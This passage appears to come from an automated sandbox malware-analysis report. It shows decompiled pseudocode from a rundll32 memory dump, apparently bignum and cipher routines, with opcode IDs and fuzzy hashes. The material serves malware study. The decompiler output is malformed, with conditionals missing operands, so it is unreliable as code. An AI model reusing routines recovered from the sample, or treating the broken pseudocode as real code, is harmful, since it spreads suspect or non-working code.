                                        				_t529 = _t527 * _t344 + _t485 * _t544;
                                        				_t584 = _a8;
                                        				_t80 = _t418 + 1; // 0x2
                                        				_t399 =  >=  ? _t486 : 0 + _t486;
                                        				_t400 = ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20);
                                        				_t530 = _t529 << 0x20;
                                        				_t81 = _t400 + 1; // 0x100000001
                                        				_t567 = _t565 * _t544 + _t530;
                                        				_t346 =  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81;
                                        				_t447 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563 + _t565 + _t567;
                                        				 *((long long*)(_t584 + 0x20)) = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563 + _t565 + _t567;
                                        				r11d = r8d;
                                        				_t84 = _t346 + 1; // 0x100000002
                                        				r9d = r11d;
                                        				_t258 =  >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84;
                                        				_t430 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84);
                                        				r10d = __ecx;
                                        				_t288 =  >=  ?  >=  ? _t286 : _t74 : _t80;
                                        				_t348 =  *(__r8 + 0x18) >> 0x20;
                                        				_t488 =  *(__rdx + 0x10) >> 0x20;
                                        				_t489 = _t488 * _t348;
                                        				_t532 = _t530 * _t348 + _t488 * _t544;
                                        				_t402 =  >=  ? _t489 : _t489 + 0;
                                        				_t403 = ( >=  ? _t489 : _t489 + 0) + (_t532 >> 0x20);
                                        				_t533 = _t532 << 0x20;
                                        				_t88 = _t403 + 1; // 0x100000001
                                        				_t569 = _t567 * _t544 + _t533;
                                        				_t350 =  >=  ? ( >=  ? _t489 : _t489 + 0) + (_t532 >> 0x20) : _t88;
                                        				_t431 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84) + _t569;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t89 = _t350 + 1; // 0x100000002
                                        				_t264 =  >=  ?  >=  ? ( >=  ? _t489 : _t489 + 0) + (_t532 >> 0x20) : _t88 : _t89;
                                        				r10d = __ecx;
                                        				_t419 = _t264 + ( >=  ?  >=  ? _t286 : _t74 : _t80);
                                        				r15b = _t419 - _t264 > 0;
                                        				_t352 =  *(__r8 + 0x10) >> 0x20;
                                        				_t491 =  *(__rdx + 0x18) >> 0x20;
                                        				_t492 = _t491 * _t352;
                                        				_t535 = _t533 * _t352 + _t491 * _t544;
                                        				_t405 =  >=  ? _t492 : _t492 + 0;
                                        				_t406 = ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20);
                                        				_t536 = _t535 << 0x20;
                                        				_t93 = _t406 + 1; // 0x100000001
                                        				_t571 = _t569 * _t544 + _t536;
                                        				_t354 =  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93;
                                        				_t432 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84) + _t569 + _t571;
                                        				_t94 = _t354 + 1; // 0x100000002
                                        				_t270 =  >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94;
                                        				 *((long long*)(_t584 + 0x28)) = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84) + _t569 + _t571;
                                        				_t97 = _t585 + 1; // 0x1
                                        				_t420 = _t419 + ( >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94);
                                        				r10d = __ecx;
                                        				_t290 =  >=  ? _t585 : _t97;
                                        				r11d = r8d;
                                        				_t356 =  *(__r8 + 0x18) >> 0x20;
                                        				r9d = r11d;
                                        				_t494 =  *(__rdx + 0x18) >> 0x20;
                                        				_t495 = _t494 * _t356;
                                        				_t538 = _t536 * _t356 + _t494 * _t544;
                                        				_t408 =  >=  ? _t495 : _t495 + 0;
                                        				_t102 = ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) + 1; // 0x100000001
                                        				_t358 =  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102;
                                        				_t421 = _t419 + ( >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94) + _t571 * _t544 + (_t538 << 0x20);
                                        				 *((long long*)(_t584 + 0x30)) = _t419 + ( >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94) + _t571 * _t544 + (_t538 << 0x20);
                                        				_t104 = _t358 + 1; // 0x100000002
                                        				_t276 =  >=  ?  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102 : _t104;
                                        				_t277 = ( >=  ?  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102 : _t104) + ( >=  ? _t585 : _t97);
                                        				 *((long long*)(_t584 + 0x38)) = ( >=  ?  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102 : _t104) + ( >=  ? _t585 : _t97);
                                        				return __eax;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4056b1a2c901d1bfe87e97da8624aa0d408a94dc0d4f487b42219b868c000c0
                                        • Instruction ID: f7a4b52753d3a3bba685475803956dfc284bff06b3a1a63c75c567e11e3669c7
                                        • Opcode Fuzzy Hash: a4056b1a2c901d1bfe87e97da8624aa0d408a94dc0d4f487b42219b868c000c0
                                        • Instruction Fuzzy Hash: CB0206A174179897CF18CFC7E555AD8A79AE3ACFC4B85A027EE0E57754EA38C681C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E0000021E21EF3053370() {
                                        				signed int _t49;
                                        				intOrPtr _t51;
                                        				signed int _t65;
                                        				signed int _t66;
                                        				void* _t76;
                                        				signed long long _t77;
                                        				signed char* _t80;
                                        				long long _t81;
                                        				void* _t85;
                                        				long long _t87;
                                        				void* _t89;
                                        				void* _t90;
                                        				signed long long _t91;
                                        				void* _t92;
                                        				signed char* _t93;
                                        				void* _t98;
                                        				long long _t99;
                                        
                                        				_t89 = _t90 - 0xf;
                                        				E0000021E21EF310C220();
                                        				_t91 = _t90 - _t76;
                                        				_t77 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t89 - 9) = _t77 ^ _t91;
                                        				r12d = _t92 + 7;
                                        				r15d = r9d;
                                        				r9d = r8d;
                                        				r12d = r12d >> 3;
                                        				 *((long long*)(_t89 - 0x49)) =  *((intOrPtr*)(_t89 + 0x6f));
                                        				_t80 =  *((intOrPtr*)(_t89 + 0x77));
                                        				 *(_t89 - 0x21) = _t80;
                                        				 *(_t89 - 0x59) = r8d;
                                        				 *((long long*)(_t89 - 0x41)) =  *((intOrPtr*)(_t89 + 0x5f));
                                        				 *((long long*)(_t89 - 0x39)) =  *((intOrPtr*)(_t89 + 0x67));
                                        				 *(_t89 - 0x4d) = r12d;
                                        				if (r8d - 0x40 > 0) goto 0xf3053b5c;
                                        				_t93 =  &(_t80[1]);
                                        				 *((long long*)(_t91 + 0xd0)) = _t81;
                                        				 *((long long*)(_t91 + 0x98)) = _t87;
                                        				 *((long long*)(_t91 + 0x90)) = _t99;
                                        				 *(_t89 - 0x31) = _t93;
                                        				if ( *((intOrPtr*)(_t89 + 0x7f)) == 0) goto 0xf305378f;
                                        				if (r15d - r12d < 0) goto 0xf3053b08;
                                        				asm("cdq");
                                        				_t66 = _t65 & 0x00000007;
                                        				_t49 = r9d + _t66;
                                        				_t51 = (_t49 & 0x00000007) - _t66;
                                        				 *(_t89 - 0x65) = _t49 >> 3;
                                        				 *((intOrPtr*)(_t89 - 0x69)) = _t51;
                                        				 *((intOrPtr*)(_t89 - 0x6d)) = 8 - _t51;
                                        				 *(_t89 - 0x61) =  *_t80 & 0x000000ff | ( *_t93 & 0x000000ff) << 0x00000008 | (_t93[1] & 0x000000ff) << 0x00000010 | (_t93[2] & 0x000000ff) << 0x00000018;
                                        				 *(_t89 - 0x5d) = _t93[3] & 0x000000ff | (_t93[4] & 0x000000ff) << 0x00000008 | ((_t80[7] & 0x000000ff) << 0x00000008 | _t93[5] & 0x000000ff) << 0x00000010;
                                        				r15d = r15d - r12d;
                                        				E0000021E21EF3051A00(r15d - r12d, _t80, _t81, _t89 - 0x61,  *((intOrPtr*)(_t89 + 0x5f)), _t85,  *((intOrPtr*)(_t89 + 0x67)),  *((intOrPtr*)(_t89 - 0x49)));
                                        				r9d = r12d;
                                        				r10d = _t98 - 1;
                                        				r8d = 0;
                                        				if (r10d - 7 > 0) goto 0xf3053521;
                                        				goto __rcx;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c3d8c2568b9301477b20efd280f597c6b4e841771baa333af57d695db086eb8
                                        • Instruction ID: aad48d4f0c120ac3e426d2d621ad97db6ae8d18c0593651792bb9b8b9731c238
                                        • Opcode Fuzzy Hash: 8c3d8c2568b9301477b20efd280f597c6b4e841771baa333af57d695db086eb8
                                        • Instruction Fuzzy Hash: EE12F363B192D08EF756C7BD48502FD3FF29362389705058ADE89A7F8AC538861AD760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 52%
                                        			E0000021E21EF3054F60() {
                                        				intOrPtr _t155;
                                        				void* _t158;
                                        				void* _t161;
                                        				signed char* _t162;
                                        				signed long long _t163;
                                        				long long _t166;
                                        				intOrPtr* _t167;
                                        				signed char* _t169;
                                        				intOrPtr* _t172;
                                        				signed char* _t173;
                                        				signed char* _t174;
                                        				signed int _t177;
                                        				void* _t179;
                                        				signed char* _t182;
                                        				void* _t185;
                                        				void* _t186;
                                        				signed int _t187;
                                        				unsigned int _t188;
                                        				void* _t191;
                                        				signed char* _t193;
                                        
                                        				 *((long long*)(_t185 + 8)) = _t166;
                                        				 *((long long*)(_t185 + 0x20)) = _t188;
                                        				_push(_t179);
                                        				_push(_t191);
                                        				E0000021E21EF310C220();
                                        				_t186 = _t185 - _t161;
                                        				_t162 =  *(_t186 + 0xa8);
                                        				_t182 = _t169;
                                        				r12d = _t162[4] & 0x000000ff;
                                        				_t167 = _t172;
                                        				_t173 =  &(_t162[1]);
                                        				r13d = r8d;
                                        				r11d =  *_t162 & 0x000000ff;
                                        				r11d = r11d | ( *_t173 & 0x000000ff) << 0x00000008;
                                        				r11d = r11d | (_t173[1] & 0x000000ff) << 0x00000010;
                                        				r11d = r11d | (_t173[2] & 0x000000ff) << 0x00000018;
                                        				r12d = r12d | (_t173[4] & 0x000000ff) << 0x00000008;
                                        				 *(_t186 + 0xa8) = r11d;
                                        				_t163 =  *(_t186 + 0xb0);
                                        				r8d =  *(_t163 + 4) & 0x000000ff;
                                        				_t174 = _t163 + 1;
                                        				r12d = r12d | ((_t162[7] & 0x000000ff) << 0x00000008 | _t173[5] & 0x000000ff) << 0x00000010;
                                        				r15d =  *_t163 & 0x000000ff;
                                        				r15d = r15d | ( *_t174 & 0x000000ff) << 0x00000008;
                                        				r15d = r15d | (_t174[1] & 0x000000ff) << 0x00000010;
                                        				 *(_t186 + 0x20) = r12d;
                                        				r15d = r15d | (_t174[2] & 0x000000ff) << 0x00000018;
                                        				r8d = r8d | (_t174[4] & 0x000000ff) << 0x00000008;
                                        				 *(_t186 + 0xb0) = r15d;
                                        				r8d = r8d | ((_t174[6] & 0x000000ff) << 0x00000008 | _t174[5] & 0x000000ff) << 0x00000010;
                                        				 *(_t186 + 0x90) = r8d;
                                        				if ( *((intOrPtr*)(_t186 + 0xb8)) == 0) goto 0xf3055312;
                                        				_t193 =  *((intOrPtr*)(_t186 + 0xa0));
                                        				_t177 =  &(_t193[1]);
                                        				r9d =  *(_t177 + 3) & 0x000000ff;
                                        				r8d =  *_t193 & 0x000000ff;
                                        				r13d =  *(_t186 + 0x90);
                                        				r8d = r8d | (_t193[1] & 0x000000ff) << 0x00000008;
                                        				r8d = r8d | ( *(_t177 + 1) & 0x000000ff) << 0x00000010;
                                        				 *(_t186 + 0xb0) = _t177;
                                        				r8d = r8d | ( *(_t177 + 2) & 0x000000ff) << 0x00000018;
                                        				r9d = r9d | ( *(_t177 + 4) & 0x000000ff) << 0x00000008;
                                        				r9d = r9d | (( *(_t177 + 6) & 0x000000ff) << 0x00000008 |  *(_t177 + 5) & 0x000000ff) << 0x00000010;
                                        				_t158 = _t191 - 8;
                                        				if (_t158 < 0) goto 0xf30551d2;
                                        				r14d = _t179 + 8;
                                        				 *((intOrPtr*)(_t186 + 0xb8)) = _t179 + _t163 * 8;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 1;
                                        				 *(_t186 + 0x28) = ( *_t182 & 0x000000ff | (_t182[1] & 0x000000ff) << 0x00000008 | (_t182[2] & 0x000000ff) << 0x00000010 | (_t182[3] & 0x000000ff) << 0x00000018) ^ r8d ^ r11d;
                                        				 *(_t186 + 0x2c) = (_t182[4] & 0x000000ff | (_t182[5] & 0x000000ff) << 0x00000008 | (_t182[6] & 0x000000ff) << 0x00000010 | (_t182[7] & 0x000000ff) << 0x00000018) ^ r9d ^ r12d;
                                        				E0000021E21EF304F380(_t163, _t167, _t186 + 0x28,  *((intOrPtr*)(_t186 + 0x98)), _t177,  *((intOrPtr*)(_t186 + 0x98)), _t187, _t188);
                                        				r8d =  *(_t186 + 0x28);
                                        				r9d =  *(_t186 + 0x2c);
                                        				r8d = r8d ^ r15d;
                                        				 *_t167 = r8b;
                                        				r9d = r9d ^ r13d;
                                        				 *((char*)(_t167 + 1)) = r8d >> 8;
                                        				 *((char*)(_t167 + 2)) = r8d >> 0x10;
                                        				 *((char*)(_t167 + 3)) = r8d >> 0x18;
                                        				 *((intOrPtr*)(_t167 + 4)) = r9b;
                                        				 *((char*)(_t167 + 5)) = r9d >> 8;
                                        				 *((char*)(_t167 + 6)) = r9d >> 0x10;
                                        				 *((char*)(_t167 + 7)) = r9d >> 0x18;
                                        				if (_t158 != 0) goto 0xf30550f0;
                                        				_t155 =  *((intOrPtr*)(_t186 + 0xb8));
                                        				r11d =  *(_t186 + 0xa8);
                                        				if (_t155 == 0xfffffff8) goto 0xf30552d3;
                                        				if (_t155 + 7 - 7 > 0) goto 0xf305525a;
                                        				goto __rax;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f2a4e4454929fdb0470fcdd18b29ad4dc6a33732055ffca6865378b8e7cc1b4
                                        • Instruction ID: 5ce53353cc56abc6dc51cfba3992d31c1ffa5e7925f079bdcfe738f0e5d593f6
                                        • Opcode Fuzzy Hash: 0f2a4e4454929fdb0470fcdd18b29ad4dc6a33732055ffca6865378b8e7cc1b4
                                        • Instruction Fuzzy Hash: 27F1E4636182E04EE325CB3D58106AEBFE0E396789F49C256EBD587B46C63CC615CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0000021E21EF30520E0() {
                                        				signed int _t36;
                                        				intOrPtr _t38;
                                        				signed int _t60;
                                        				signed int _t61;
                                        				void* _t71;
                                        				signed long long _t72;
                                        				long long _t77;
                                        				long long _t80;
                                        				long long _t84;
                                        				void* _t85;
                                        				void* _t86;
                                        				signed long long _t87;
                                        				signed char* _t88;
                                        				signed char* _t89;
                                        				unsigned int _t90;
                                        				long long _t92;
                                        				long long _t94;
                                        
                                        				_t85 = _t86 - 0x1f;
                                        				E0000021E21EF310C220();
                                        				_t87 = _t86 - _t71;
                                        				_t72 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t85 - 1) = _t72 ^ _t87;
                                        				 *((long long*)(_t85 - 0x31)) =  *((intOrPtr*)(_t85 + 0x6f));
                                        				r12d = r9d;
                                        				_t90 = r8d;
                                        				_t88 =  *((intOrPtr*)(_t85 + 0x77));
                                        				asm("cdq");
                                        				 *(_t85 - 0x19) = _t88;
                                        				_t61 = _t60 & 0x00000007;
                                        				_t36 = r9d + _t61;
                                        				r15d = _t36;
                                        				_t38 = (_t36 & 0x00000007) - _t61;
                                        				r15d = r15d >> 3;
                                        				r11d = _t38;
                                        				 *((intOrPtr*)(_t85 - 0x3d)) = _t38;
                                        				 *(_t85 - 0x51) = r15d;
                                        				asm("cdq");
                                        				if (_t90 - 1 - 0x3f > 0) goto 0xf305275d;
                                        				 *((long long*)(_t87 + 0xc0)) = _t84;
                                        				 *((long long*)(_t87 + 0x88)) = _t92;
                                        				 *((long long*)(_t87 + 0x80)) = _t94;
                                        				r14d =  *_t88 & 0x000000ff;
                                        				_t89 =  &(_t88[1]);
                                        				r14d = r14d | (_t88[1] & 0x000000ff) << 0x00000008;
                                        				 *(_t85 - 0x21) = _t89;
                                        				 *((long long*)(_t85 - 0x29)) = _t90;
                                        				r14d = r14d | (_t89[1] & 0x000000ff) << 0x00000010;
                                        				r14d = r14d | (_t88[3] & 0x000000ff) << 0x00000018;
                                        				if ( *((intOrPtr*)(_t85 + 0x7f)) == 0) goto 0xf3052464;
                                        				if (r12d - r10d < 0) goto 0xf3052706;
                                        				 *((intOrPtr*)(_t85 - 0x4d)) = 8 - r11d;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 1;
                                        				 *(_t85 - 0x49) = r14d;
                                        				r12d = r12d - r10d;
                                        				 *(_t85 - 0x45) = _t88[4] & 0x000000ff | (_t89[4] & 0x000000ff) << 0x00000008 | ((_t89[6] & 0x000000ff) << 0x00000008 | _t89[5] & 0x000000ff) << 0x00000010;
                                        				E0000021E21EF304F380( *((intOrPtr*)(_t85 + 0x6f)), _t80, _t85 - 0x49,  *((intOrPtr*)(_t85 - 0x31)), _t77, _t84, _t89, _t90);
                                        				r8d = 0;
                                        				r9d = (_t90 + 7 + (_t61 & 0x00000007) >> 3) - 1;
                                        				r10d = r13d;
                                        				if (r9d - 7 > 0) goto 0xf305229d;
                                        				goto __rcx;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00af9cba418553f47e4c48ebe70a102cb1717491fa15dca13acfad9a500ac6ff
                                        • Instruction ID: bf873b8df6bff11c5aff8cf805956d3c50da6b6c1751898e4cded58344d0277d
                                        • Opcode Fuzzy Hash: 00af9cba418553f47e4c48ebe70a102cb1717491fa15dca13acfad9a500ac6ff
                                        • Instruction Fuzzy Hash: 55E10A33B181A08EEB158B7998902FD3FB2F76238DB054146DE9923F89C53D860EDB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5921c665f5c3b5d8862c264280056fea5a07f520c1c9bb8358a102d364e7bab1
                                        • Instruction ID: 8c5af7b4ddb12fae1b8a60b3bc65ec2353f9b66a83930535a0dccd8199d7797e
                                        • Opcode Fuzzy Hash: 5921c665f5c3b5d8862c264280056fea5a07f520c1c9bb8358a102d364e7bab1
                                        • Instruction Fuzzy Hash: BEE1D1733206608BE758CF28D859B7D37E1E799301F82902AEB15C7B85DA3A9914CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: ab5865cb1fb637fff63a1426d89b6e8ed9ba1ca4973769de1a1ef26053e96995
                                        • Instruction ID: 5496ec6eeb52a42f3673574c53ac01c32a96c55113f96b2ed2f6c52647332c83
                                        • Opcode Fuzzy Hash: ab5865cb1fb637fff63a1426d89b6e8ed9ba1ca4973769de1a1ef26053e96995
                                        • Instruction Fuzzy Hash: A1F17977600B8486EB14CF25E88839E73B5F399BA4F158226EF9957B95DF38C482C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 99%
                                        			E0000021E21EF30949C0(void* __eax, signed int __ecx, signed int __edx, long long __rbx, signed long long* __rcx, unsigned int* __rdx, long long __rdi, long long __rsi, signed int __r8, signed int __r10, void* __r11) {
                                        				signed int _t70;
                                        				signed int _t72;
                                        				signed int _t74;
                                        				signed int _t75;
                                        				void* _t132;
                                        				void* _t136;
                                        				void* _t148;
                                        				void* _t158;
                                        				void* _t170;
                                        				void* _t179;
                                        				void* _t186;
                                        				signed long long _t194;
                                        				void* _t197;
                                        				signed long long _t201;
                                        				signed long long _t208;
                                        				void* _t211;
                                        				signed long long _t213;
                                        				signed long long _t222;
                                        				signed long long _t229;
                                        				void* _t233;
                                        				void* _t236;
                                        				signed long long _t239;
                                        				signed long long _t240;
                                        				signed long long _t242;
                                        				signed long long _t243;
                                        				signed long long _t246;
                                        				signed long long _t247;
                                        				void* _t249;
                                        				signed long long _t251;
                                        				signed long long _t252;
                                        				void* _t254;
                                        				signed long long _t256;
                                        				signed long long _t257;
                                        				signed long long _t259;
                                        				signed long long _t260;
                                        				signed long long _t263;
                                        				signed long long _t264;
                                        				void* _t266;
                                        				signed long long _t268;
                                        				signed long long _t269;
                                        				signed long long _t271;
                                        				signed long long _t272;
                                        				void* _t279;
                                        				void* _t290;
                                        				long long _t298;
                                        				void* _t300;
                                        				unsigned long long _t302;
                                        				signed long long _t303;
                                        				signed long long _t305;
                                        				void* _t307;
                                        				signed long long _t310;
                                        				signed long long _t312;
                                        				unsigned long long _t314;
                                        				void* _t316;
                                        				signed long long _t317;
                                        				signed long long _t319;
                                        				void* _t321;
                                        				signed long long _t322;
                                        				unsigned long long _t324;
                                        				void* _t326;
                                        				signed long long _t329;
                                        				signed long long _t331;
                                        				unsigned long long _t333;
                                        				void* _t335;
                                        				signed long long _t336;
                                        				unsigned long long _t338;
                                        				signed long long _t341;
                                        				signed long long _t345;
                                        				signed long long _t347;
                                        				signed long long _t349;
                                        				signed long long _t351;
                                        				signed long long _t356;
                                        				signed long long _t358;
                                        				signed long long _t360;
                                        				signed long long _t362;
                                        				signed long long _t364;
                                        				signed long long _t366;
                                        				void* _t368;
                                        				void* _t373;
                                        				void* _t376;
                                        
                                        				_t371 = __r11;
                                        				 *((long long*)(_t300 + 8)) = __rbx;
                                        				 *((long long*)(_t300 + 0x10)) = _t298;
                                        				 *((long long*)(_t300 + 0x18)) = __rsi;
                                        				 *((long long*)(_t300 + 0x20)) = __rdi;
                                        				r10d = r9d;
                                        				_t345 =  *__rdx >> 0x20;
                                        				r8d = r10d;
                                        				_t302 = __r8 * _t345;
                                        				_t303 = _t302 << 0x21;
                                        				_t347 = _t345 * _t345 + (_t302 >> 0x1f);
                                        				_t356 = __r10 * __r10 + _t303;
                                        				 *__rcx = _t356;
                                        				_t178 =  >=  ? _t347 : _t347 + 1;
                                        				r9d = __ecx;
                                        				_t194 =  *__rdx >> 0x20;
                                        				r10d = __edx;
                                        				_t239 = __rdx[2] >> 0x20;
                                        				r8d = r10d;
                                        				_t240 = _t239 * _t194;
                                        				_t305 = _t303 * _t194 + _t239 * _t347;
                                        				_t196 =  >=  ? _t240 : _t240 + 0;
                                        				_t197 = ( >=  ? _t240 : _t240 + 0) + (_t305 >> 0x20);
                                        				_t358 = _t356 * _t347 + (_t305 << 0x20);
                                        				_t242 =  >=  ? _t197 : _t197 + 1;
                                        				_t275 = _t358 + ( >=  ? _t347 : _t347 + 1);
                                        				_t307 = _t242 + 1;
                                        				_t132 =  >=  ? _t242 : _t307;
                                        				_t179 = _t132;
                                        				asm("dec eax");
                                        				_t70 = 0 | _t179 - _t132 > 0x00000000;
                                        				_t276 = _t358 + ( >=  ? _t347 : _t347 + 1) + _t358;
                                        				__rcx[1] = _t358 + ( >=  ? _t347 : _t347 + 1) + _t358;
                                        				_t308 =  >=  ? _t242 : _t307;
                                        				_t180 = _t179 + ( >=  ? _t242 : _t307);
                                        				_t14 = _t197 + 1; // 0x1
                                        				r9d = r8d;
                                        				_t289 =  >=  ? _t197 : _t14;
                                        				_t74 = r9d;
                                        				_t310 = __rdx[2] >> 0x20;
                                        				_t243 = _t242 * _t310;
                                        				_t312 = _t310 * _t310 + (_t243 >> 0x1f);
                                        				_t349 = _t347 * _t347 + (_t243 << 0x21);
                                        				_t199 =  >=  ? _t312 : _t312 + 1;
                                        				_t181 = _t179 + ( >=  ? _t242 : _t307) + _t349;
                                        				_t136 =  >=  ?  >=  ? _t312 : _t312 + 1 : ( >=  ? _t312 : _t312 + 1) + 1;
                                        				_t290 = ( >=  ? _t197 : _t14) + _t136;
                                        				r9d = _t70;
                                        				r10d = _t74;
                                        				r11d = 0;
                                        				r11b = _t290 - _t136 > 0;
                                        				r8d = r10d;
                                        				_t201 =  *__rdx >> 0x20;
                                        				_t246 = __rdx[4] >> 0x20;
                                        				_t247 = _t246 * _t201;
                                        				_t314 = _t312 * _t201 + _t246 * _t349;
                                        				_t203 =  >=  ? _t247 : _t247 + 0;
                                        				_t204 = ( >=  ? _t247 : _t247 + 0) + (_t314 >> 0x20);
                                        				_t360 = _t358 * _t349 + (_t314 << 0x20);
                                        				_t249 =  >=  ? ( >=  ? _t247 : _t247 + 0) + (_t314 >> 0x20) : ( >=  ? _t247 : _t247 + 0) + (_t314 >> 0x20) + 1;
                                        				_t182 = _t179 + ( >=  ? _t242 : _t307) + _t349 + _t360;
                                        				_t21 = _t371 + 1; // 0x1
                                        				_t316 = _t249 + 1;
                                        				_t142 =  >=  ? _t249 : _t316;
                                        				_t291 = _t290 + ( >=  ? _t249 : _t316);
                                        				_t206 =  >=  ? __r11 : _t21;
                                        				_t183 = _t179 + ( >=  ? _t242 : _t307) + _t349 + _t360 + _t360;
                                        				__rcx[2] = _t179 + ( >=  ? _t242 : _t307) + _t349 + _t360 + _t360;
                                        				_t317 =  >=  ? _t249 : _t316;
                                        				_t292 = _t290 + ( >=  ? _t249 : _t316) + _t317;
                                        				r10d = _t74;
                                        				_t25 = _t206 + 1; // 0x2
                                        				r8d = r10d;
                                        				_t278 =  >=  ?  >=  ? __r11 : _t21 : _t25;
                                        				_t251 = __rdx[6] >> 0x20;
                                        				r9d = _t70;
                                        				_t208 =  *__rdx >> 0x20;
                                        				_t252 = _t251 * _t208;
                                        				_t319 = _t317 * _t208 + _t251 * _t349;
                                        				_t210 =  >=  ? _t252 : _t252 + 0;
                                        				_t211 = ( >=  ? _t252 : _t252 + 0) + (_t319 >> 0x20);
                                        				_t27 = _t211 + 1; // 0x2
                                        				_t362 = _t360 * _t349 + (_t319 << 0x20);
                                        				_t254 =  >=  ? _t211 : _t27;
                                        				_t293 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362;
                                        				_t28 = _t254 + 1; // 0x3
                                        				_t321 = _t28;
                                        				_t148 =  >=  ? _t254 : _t321;
                                        				_t279 = ( >=  ?  >=  ? __r11 : _t21 : _t25) + _t148;
